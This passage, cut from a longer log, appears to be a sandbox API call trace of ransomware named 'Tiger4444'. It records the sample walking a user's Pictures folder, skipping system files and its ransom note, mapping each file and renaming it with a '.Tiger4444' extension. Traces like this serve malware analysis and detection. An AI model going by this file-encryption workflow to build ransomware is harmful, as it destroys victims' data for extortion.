ftLastWriteTime.dwLowDateTime=0xcc4f1e20, ftLastWriteTime.dwHighDateTime=0x1d4d4a0, nFileSizeHigh=0x0, nFileSizeLow=0x2d2d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="FgcCERd5K.gif", cAlternateFileName="FGCCER~1.GIF")) returned 1 [0045.554] lstrcmpiW (lpString1="FgcCERd5K.gif", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0045.554] lstrcmpiW (lpString1="FgcCERd5K.gif", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0045.555] lstrcmpiW (lpString1="FgcCERd5K.gif", lpString2="Tiger4444.exe") returned -1 [0045.555] lstrcmpiW (lpString1="FgcCERd5K.gif", lpString2=".") returned 1 [0045.555] lstrcmpiW (lpString1="FgcCERd5K.gif", lpString2="..") returned 1 [0045.555] lstrcmpiW (lpString1="FgcCERd5K.gif", lpString2="windows") returned -1 [0045.555] lstrcmpiW (lpString1="FgcCERd5K.gif", lpString2="bootmgr") returned 1 [0045.555] lstrcmpiW (lpString1="FgcCERd5K.gif", lpString2="pagefile.sys") returned -1 [0045.555] lstrcmpiW (lpString1="FgcCERd5K.gif", lpString2="boot") returned 1 [0045.555] lstrcmpiW (lpString1="FgcCERd5K.gif", lpString2="ids.txt") returned -1 [0045.555] lstrcmpiW (lpString1="FgcCERd5K.gif", lpString2="NTUSER.DAT") returned -1 [0045.555] lstrcpyW (in: lpString1=0x30aeada, lpString2="FgcCERd5K.gif" | out: lpString1="FgcCERd5K.gif") returned="FgcCERd5K.gif" [0045.555] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\FgcCERd5K.gif", dwFileAttributes=0x0) returned 1 [0045.555] lstrlenW (lpString="FgcCERd5K.gif") returned 13 [0045.555] lstrlenW (lpString="Tiger4444") returned 9 [0045.555] lstrcmpiW (lpString1="ERd5K.gif", lpString2="Tiger4444") returned -1 [0045.555] lstrlenW (lpString=".dll") returned 4 [0045.555] lstrcmpiW (lpString1=".gif", lpString2=".dll") returned 1 [0045.555] lstrlenW (lpString=".lnk") returned 4 [0045.555] lstrcmpiW (lpString1=".gif", lpString2=".lnk") returned -1 [0045.555] lstrlenW (lpString=".ini") returned 4 [0045.555] lstrcmpiW (lpString1=".gif", lpString2=".ini") returned -1 [0045.555] lstrlenW (lpString=".sys") returned 4 [0045.555] lstrcmpiW (lpString1=".gif", lpString2=".sys") returned -1 [0045.555] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\FgcCERd5K.gif" (normalized: "c:\\users\\fd1hvy\\pictures\\fgccerd5k.gif"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0045.555] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0045.555] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13700851519) returned 1 [0045.555] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=11565) returned 1 [0045.556] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc899c8 [0045.556] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71730 [0045.556] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x3030, lpName=0x0) returned 0x2c8 [0045.556] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x3030) returned 0xbe0000 [0045.557] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0045.557] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76440 [0045.557] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0045.557] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc760f8 [0045.557] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0045.557] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc760f8 | out: hHeap=0xc50000) returned 1 [0045.557] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0045.557] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76440 | out: hHeap=0xc50000) returned 1 [0045.557] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13701009626) returned 1 [0045.557] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc899c8 | out: hHeap=0xc50000) returned 1 [0045.557] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71730 | out: hHeap=0xc50000) returned 1 [0045.557] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0045.557] CloseHandle (hObject=0x2c8) returned 1 [0045.557] CloseHandle (hObject=0x260) returned 1 [0045.559] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Pictures\\FgcCERd5K.gif.Tiger4444") returned 48 [0045.559] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Pictures\\FgcCERd5K.gif" (normalized: "c:\\users\\fd1hvy\\pictures\\fgccerd5k.gif"), lpNewFileName="C:\\Users\\FD1HVy\\Pictures\\FgcCERd5K.gif.Tiger4444" (normalized: "c:\\users\\fd1hvy\\pictures\\fgccerd5k.gif.tiger4444"), dwFlags=0x1) returned 1 [0045.559] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=11568 | out: Addend=0xc6f980) returned 17079840 [0045.559] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=1 | out: Addend=0xc6f98c) returned 4490 [0045.559] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x230fe380, ftCreationTime.dwHighDateTime=0x1d4d2e3, ftLastAccessTime.dwLowDateTime=0x5a6be320, ftLastAccessTime.dwHighDateTime=0x1d4cf45, ftLastWriteTime.dwLowDateTime=0x5a6be320, ftLastWriteTime.dwHighDateTime=0x1d4cf45, nFileSizeHigh=0x0, nFileSizeLow=0x11e18, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="fJ6HL8oLrkhks9adl.jpg", cAlternateFileName="FJ6HL8~1.JPG")) returned 1 [0045.559] lstrcmpiW (lpString1="fJ6HL8oLrkhks9adl.jpg", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0045.559] lstrcmpiW (lpString1="fJ6HL8oLrkhks9adl.jpg", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0045.559] lstrcmpiW (lpString1="fJ6HL8oLrkhks9adl.jpg", lpString2="Tiger4444.exe") returned -1 [0045.559] lstrcmpiW (lpString1="fJ6HL8oLrkhks9adl.jpg", lpString2=".") returned 1 [0045.559] lstrcmpiW (lpString1="fJ6HL8oLrkhks9adl.jpg", lpString2="..") returned 1 [0045.559] lstrcmpiW (lpString1="fJ6HL8oLrkhks9adl.jpg", lpString2="windows") returned -1 [0045.559] lstrcmpiW (lpString1="fJ6HL8oLrkhks9adl.jpg", lpString2="bootmgr") returned 1 [0045.559] lstrcmpiW (lpString1="fJ6HL8oLrkhks9adl.jpg", lpString2="pagefile.sys") returned -1 [0045.559] lstrcmpiW (lpString1="fJ6HL8oLrkhks9adl.jpg", lpString2="boot") returned 1 [0045.560] lstrcmpiW (lpString1="fJ6HL8oLrkhks9adl.jpg", lpString2="ids.txt") returned -1 [0045.560] lstrcmpiW (lpString1="fJ6HL8oLrkhks9adl.jpg", lpString2="NTUSER.DAT") returned -1 [0045.560] lstrcpyW (in: lpString1=0x30aeada, lpString2="fJ6HL8oLrkhks9adl.jpg" | out: lpString1="fJ6HL8oLrkhks9adl.jpg") returned="fJ6HL8oLrkhks9adl.jpg" [0045.560] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\fJ6HL8oLrkhks9adl.jpg", dwFileAttributes=0x0) returned 1 [0045.560] lstrlenW (lpString="fJ6HL8oLrkhks9adl.jpg") returned 21 [0045.560] lstrlenW (lpString="Tiger4444") returned 9 [0045.560] lstrcmpiW (lpString1="s9adl.jpg", lpString2="Tiger4444") returned -1 [0045.560] lstrlenW (lpString=".dll") returned 4 [0045.560] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0045.560] lstrlenW (lpString=".lnk") returned 4 [0045.560] lstrcmpiW (lpString1=".jpg", lpString2=".lnk") returned -1 [0045.560] lstrlenW (lpString=".ini") returned 4 [0045.560] lstrcmpiW (lpString1=".jpg", lpString2=".ini") returned 1 [0045.560] lstrlenW (lpString=".sys") returned 4 [0045.560] lstrcmpiW (lpString1=".jpg", lpString2=".sys") returned -1 [0045.560] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\fJ6HL8oLrkhks9adl.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\fj6hl8olrkhks9adl.jpg"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0045.560] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0045.560] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13701333337) returned 1 [0045.560] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=73240) returned 1 [0045.560] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc89c98 [0045.560] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71620 [0045.560] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x12120, lpName=0x0) returned 0x2c8 [0045.561] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x12120) returned 0xbe0000 [0045.562] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0045.562] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76440 [0045.562] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0045.562] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75608 [0045.562] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0045.563] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75608 | out: hHeap=0xc50000) returned 1 [0045.563] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0045.563] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76440 | out: hHeap=0xc50000) returned 1 [0045.563] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13701591136) returned 1 [0045.563] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc89c98 | out: hHeap=0xc50000) returned 1 [0045.563] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71620 | out: hHeap=0xc50000) returned 1 [0045.563] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0045.564] CloseHandle (hObject=0x2c8) returned 1 [0045.564] CloseHandle (hObject=0x260) returned 1 [0045.566] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Pictures\\fJ6HL8oLrkhks9adl.jpg.Tiger4444") returned 56 [0045.566] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Pictures\\fJ6HL8oLrkhks9adl.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\fj6hl8olrkhks9adl.jpg"), lpNewFileName="C:\\Users\\FD1HVy\\Pictures\\fJ6HL8oLrkhks9adl.jpg.Tiger4444" (normalized: "c:\\users\\fd1hvy\\pictures\\fj6hl8olrkhks9adl.jpg.tiger4444"), dwFlags=0x1) returned 1 [0045.566] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=73248 | out: Addend=0xc6f980) returned 17091408 [0045.566] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=2 | out: Addend=0xc6f98c) returned 4491 [0045.566] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbc83a1d0, ftCreationTime.dwHighDateTime=0x1d4cf7a, ftLastAccessTime.dwLowDateTime=0x156a2100, ftLastAccessTime.dwHighDateTime=0x1d4cdf7, ftLastWriteTime.dwLowDateTime=0x156a2100, ftLastWriteTime.dwHighDateTime=0x1d4cdf7, nFileSizeHigh=0x0, nFileSizeLow=0x129c1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="gTPmnYJT.gif", cAlternateFileName="")) returned 1 [0045.567] lstrcmpiW (lpString1="gTPmnYJT.gif", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0045.567] lstrcmpiW (lpString1="gTPmnYJT.gif", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0045.567] lstrcmpiW (lpString1="gTPmnYJT.gif", lpString2="Tiger4444.exe") returned -1 [0045.567] lstrcmpiW (lpString1="gTPmnYJT.gif", lpString2=".") returned 1 [0045.567] lstrcmpiW (lpString1="gTPmnYJT.gif", lpString2="..") returned 1 [0045.567] lstrcmpiW (lpString1="gTPmnYJT.gif", lpString2="windows") returned -1 [0045.567] lstrcmpiW (lpString1="gTPmnYJT.gif", lpString2="bootmgr") returned 1 [0045.567] lstrcmpiW (lpString1="gTPmnYJT.gif", lpString2="pagefile.sys") returned -1 [0045.567] lstrcmpiW (lpString1="gTPmnYJT.gif", lpString2="boot") returned 1 [0045.567] lstrcmpiW (lpString1="gTPmnYJT.gif", lpString2="ids.txt") returned -1 [0045.567] lstrcmpiW (lpString1="gTPmnYJT.gif", lpString2="NTUSER.DAT") returned -1 [0045.567] lstrcpyW (in: lpString1=0x30aeada, lpString2="gTPmnYJT.gif" | out: lpString1="gTPmnYJT.gif") returned="gTPmnYJT.gif" [0045.567] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\gTPmnYJT.gif", dwFileAttributes=0x0) returned 1 [0045.567] lstrlenW (lpString="gTPmnYJT.gif") returned 12 [0045.567] lstrlenW (lpString="Tiger4444") returned 9 [0045.567] lstrcmpiW (lpString1="mnYJT.gif", lpString2="Tiger4444") returned -1 [0045.567] lstrlenW (lpString=".dll") returned 4 [0045.567] lstrcmpiW (lpString1=".gif", lpString2=".dll") returned 1 [0045.567] lstrlenW (lpString=".lnk") returned 4 [0045.567] lstrcmpiW (lpString1=".gif", lpString2=".lnk") returned -1 [0045.567] lstrlenW (lpString=".ini") returned 4 [0045.567] lstrcmpiW (lpString1=".gif", lpString2=".ini") returned -1 [0045.567] lstrlenW (lpString=".sys") returned 4 [0045.567] lstrcmpiW (lpString1=".gif", lpString2=".sys") returned -1 [0045.567] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\gTPmnYJT.gif" (normalized: "c:\\users\\fd1hvy\\pictures\\gtpmnyjt.gif"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0045.567] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0045.567] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13702059571) returned 1 [0045.568] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=76225) returned 1 [0045.568] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc896f8 [0045.568] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc719d8 [0045.568] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x12cd0, lpName=0x0) returned 0x2c8 [0045.568] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x12cd0) returned 0xbe0000 [0045.569] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0045.569] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75838 [0045.569] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0045.569] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc76210 [0045.569] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0045.570] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc76210 | out: hHeap=0xc50000) returned 1 [0045.570] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0045.570] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75838 | out: hHeap=0xc50000) returned 1 [0045.570] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13702277692) returned 1 [0045.570] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc896f8 | out: hHeap=0xc50000) returned 1 [0045.570] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc719d8 | out: hHeap=0xc50000) returned 1 [0045.570] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0045.570] CloseHandle (hObject=0x2c8) returned 1 [0045.571] CloseHandle (hObject=0x260) returned 1 [0045.573] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Pictures\\gTPmnYJT.gif.Tiger4444") returned 47 [0045.573] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Pictures\\gTPmnYJT.gif" (normalized: "c:\\users\\fd1hvy\\pictures\\gtpmnyjt.gif"), lpNewFileName="C:\\Users\\FD1HVy\\Pictures\\gTPmnYJT.gif.Tiger4444" (normalized: "c:\\users\\fd1hvy\\pictures\\gtpmnyjt.gif.tiger4444"), dwFlags=0x1) returned 1 [0045.574] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=76240 | out: Addend=0xc6f980) returned 17164656 [0045.574] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=2 | out: Addend=0xc6f98c) returned 4493 [0045.574] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7bce8e30, ftCreationTime.dwHighDateTime=0x1d4ced4, ftLastAccessTime.dwLowDateTime=0x5605f6b0, ftLastAccessTime.dwHighDateTime=0x1d4cfa2, ftLastWriteTime.dwLowDateTime=0x5605f6b0, ftLastWriteTime.dwHighDateTime=0x1d4cfa2, nFileSizeHigh=0x0, nFileSizeLow=0x13a8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hsN3S _.jpg", cAlternateFileName="HSN3S_~1.JPG")) returned 1 [0045.574] lstrcmpiW (lpString1="hsN3S _.jpg", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0045.574] lstrcmpiW (lpString1="hsN3S _.jpg", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0045.574] lstrcmpiW (lpString1="hsN3S _.jpg", lpString2="Tiger4444.exe") returned -1 [0045.574] lstrcmpiW (lpString1="hsN3S _.jpg", lpString2=".") returned 1 [0045.574] lstrcmpiW (lpString1="hsN3S _.jpg", lpString2="..") returned 1 [0045.574] lstrcmpiW (lpString1="hsN3S _.jpg", lpString2="windows") returned -1 [0045.574] lstrcmpiW (lpString1="hsN3S _.jpg", lpString2="bootmgr") returned 1 [0045.574] lstrcmpiW (lpString1="hsN3S _.jpg", lpString2="pagefile.sys") returned -1 [0045.574] lstrcmpiW (lpString1="hsN3S _.jpg", lpString2="boot") returned 1 [0045.574] lstrcmpiW (lpString1="hsN3S _.jpg", lpString2="ids.txt") returned -1 [0045.574] lstrcmpiW (lpString1="hsN3S _.jpg", lpString2="NTUSER.DAT") returned -1 [0045.574] lstrcpyW (in: lpString1=0x30aeada, lpString2="hsN3S _.jpg" | out: lpString1="hsN3S _.jpg") returned="hsN3S _.jpg" [0045.575] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\hsN3S _.jpg", dwFileAttributes=0x0) returned 1 [0045.575] lstrlenW (lpString="hsN3S _.jpg") returned 11 [0045.575] lstrlenW (lpString="Tiger4444") returned 9 [0045.575] lstrcmpiW (lpString1="N3S _.jpg", lpString2="Tiger4444") returned -1 [0045.575] lstrlenW (lpString=".dll") returned 4 [0045.575] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0045.575] lstrlenW (lpString=".lnk") returned 4 [0045.575] lstrcmpiW (lpString1=".jpg", lpString2=".lnk") returned -1 [0045.575] lstrlenW (lpString=".ini") returned 4 [0045.575] lstrcmpiW (lpString1=".jpg", lpString2=".ini") returned 1 [0045.575] lstrlenW (lpString=".sys") returned 4 [0045.575] lstrcmpiW (lpString1=".jpg", lpString2=".sys") returned -1 [0045.575] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\hsN3S _.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\hsn3s _.jpg"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0045.575] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0045.575] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: lpPerformanceCount=0x30abf30*=13702850708) returned 1 [0045.575] GetFileSizeEx (in: hFile=0x260, lpFileSize=0x30abf88 | out: lpFileSize=0x30abf88*=5032) returned 1 [0045.576] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x6c) returned 0xc898d8 [0045.576] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x80) returned 0xc71b70 [0045.576] CreateFileMappingW (hFile=0x260, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x16b0, lpName=0x0) returned 0x2c8 [0045.576] MapViewOfFile (hFileMappingObject=0x2c8, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x16b0) returned 0xbe0000 [0045.576] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x100) returned 0xc612d8 [0045.576] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75a68 [0045.576] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc612d8 | out: hHeap=0xc50000) returned 1 [0045.576] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x104) returned 0xc75b80 [0045.576] RtlAllocateHeap (HeapHandle=0xc50000, Flags=0x8, Size=0x208) returned 0xc81d40 [0045.577] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75b80 | out: hHeap=0xc50000) returned 1 [0045.577] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc81d40 | out: hHeap=0xc50000) returned 1 [0045.577] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc75a68 | out: hHeap=0xc50000) returned 1 [0045.577] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf38 | out: lpPerformanceCount=0x30abf38*=13702995213) returned 1 [0045.577] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc898d8 | out: hHeap=0xc50000) returned 1 [0045.577] HeapFree (in: hHeap=0xc50000, dwFlags=0x0, lpMem=0xc71b70 | out: hHeap=0xc50000) returned 1 [0045.577] UnmapViewOfFile (lpBaseAddress=0xbe0000) returned 1 [0045.577] CloseHandle (hObject=0x2c8) returned 1 [0045.577] CloseHandle (hObject=0x260) returned 1 [0045.579] wsprintfW (in: param_1=0x30ac238, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\Pictures\\hsN3S _.jpg.Tiger4444") returned 46 [0045.579] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\Pictures\\hsN3S _.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\hsn3s _.jpg"), lpNewFileName="C:\\Users\\FD1HVy\\Pictures\\hsN3S _.jpg.Tiger4444" (normalized: "c:\\users\\fd1hvy\\pictures\\hsn3s _.jpg.tiger4444"), dwFlags=0x1) returned 1 [0045.579] InterlockedExchangeAdd (in: Addend=0xc6f980, Value=5040 | out: Addend=0xc6f980) returned 17240896 [0045.579] InterlockedExchangeAdd (in: Addend=0xc6f98c, Value=1 | out: Addend=0xc6f98c) returned 4495 [0045.579] FindNextFileW (in: hFindFile=0xc72d48, lpFindFileData=0x30adf58 | out: lpFindFileData=0x30adf58*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x33bc7c90, ftCreationTime.dwHighDateTime=0x1d4c959, ftLastAccessTime.dwLowDateTime=0x994b3fd0, ftLastAccessTime.dwHighDateTime=0x1d4cb1e, ftLastWriteTime.dwLowDateTime=0x994b3fd0, ftLastWriteTime.dwHighDateTime=0x1d4cb1e, nFileSizeHigh=0x0, nFileSizeLow=0xe73c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Hsyb4EvKfZDCo8.gif", cAlternateFileName="HSYB4E~1.GIF")) returned 1 [0045.579] lstrcmpiW (lpString1="Hsyb4EvKfZDCo8.gif", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0045.580] lstrcmpiW (lpString1="Hsyb4EvKfZDCo8.gif", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0045.580] lstrcmpiW (lpString1="Hsyb4EvKfZDCo8.gif", lpString2="Tiger4444.exe") returned -1 [0045.580] lstrcmpiW (lpString1="Hsyb4EvKfZDCo8.gif", lpString2=".") returned 1 [0045.580] lstrcmpiW (lpString1="Hsyb4EvKfZDCo8.gif", lpString2="..") returned 1 [0045.580] lstrcmpiW (lpString1="Hsyb4EvKfZDCo8.gif", lpString2="windows") returned -1 [0045.580] lstrcmpiW (lpString1="Hsyb4EvKfZDCo8.gif", lpString2="bootmgr") returned 1 [0045.580] lstrcmpiW (lpString1="Hsyb4EvKfZDCo8.gif", lpString2="pagefile.sys") returned -1 [0045.580] lstrcmpiW (lpString1="Hsyb4EvKfZDCo8.gif", lpString2="boot") returned 1 [0045.580] lstrcmpiW (lpString1="Hsyb4EvKfZDCo8.gif", lpString2="ids.txt") returned -1 [0045.580] lstrcmpiW (lpString1="Hsyb4EvKfZDCo8.gif", lpString2="NTUSER.DAT") returned -1 [0045.580] lstrcpyW (in: lpString1=0x30aeada, lpString2="Hsyb4EvKfZDCo8.gif" | out: lpString1="Hsyb4EvKfZDCo8.gif") returned="Hsyb4EvKfZDCo8.gif" [0045.580] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\Hsyb4EvKfZDCo8.gif", dwFileAttributes=0x0) returned 1 [0045.580] lstrlenW (lpString="Hsyb4EvKfZDCo8.gif") returned 18 [0045.580] lstrlenW (lpString="Tiger4444") returned 9 [0045.580] lstrcmpiW (lpString1="ZDCo8.gif", lpString2="Tiger4444") returned 1 [0045.580] lstrlenW (lpString=".dll") returned 4 [0045.580] lstrcmpiW (lpString1=".gif", lpString2=".dll") returned 1 [0045.580] lstrlenW (lpString=".lnk") returned 4 [0045.580] lstrcmpiW (lpString1=".gif", lpString2=".lnk") returned -1 [0045.580] lstrlenW (lpString=".ini") returned 4 [0045.580] lstrcmpiW (lpString1=".gif", lpString2=".ini") returned -1 [0045.580] lstrlenW (lpString=".sys") returned 4 [0045.580] lstrcmpiW (lpString1=".gif", lpString2=".sys") returned -1 [0045.581] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\Hsyb4EvKfZDCo8.gif" (normalized: "c:\\users\\fd1hvy\\pictures\\hsyb4evkfzdco8.gif"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x260 [0045.581] QueryPerformanceFrequency (in: lpFrequency=0x30abf28 | out: lpFrequency=0x30abf28*=100000000) returned 1 [0045.581] QueryPerformanceCounter (in: lpPerformanceCount=0x30abf30 | out: 